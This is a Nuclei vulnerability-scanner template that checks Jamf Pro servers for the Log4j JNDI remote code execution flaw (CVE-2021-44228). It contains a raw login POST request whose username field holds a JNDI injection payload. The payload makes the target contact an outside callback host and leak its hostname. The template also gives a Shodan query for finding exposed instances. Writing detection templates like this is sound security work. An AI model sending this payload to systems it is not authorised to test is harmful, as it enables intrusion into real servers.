nuclei-templates/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml

61 lines
1.9 KiB
YAML

id: jamf-pro-log4j-rce
info:
name: JamF Pro - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK,pdteam
severity: critical
description: |
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
reference:
- https://github.com/random-robbie/jamf-log4j
- https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html
- https://community.connection.com/what-is-jamf/
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-917
metadata:
shodan-query: title:"Jamf Pro"
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- type: word
part: body
words:
- "<title>Jamf Pro Login</title>"
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/05/27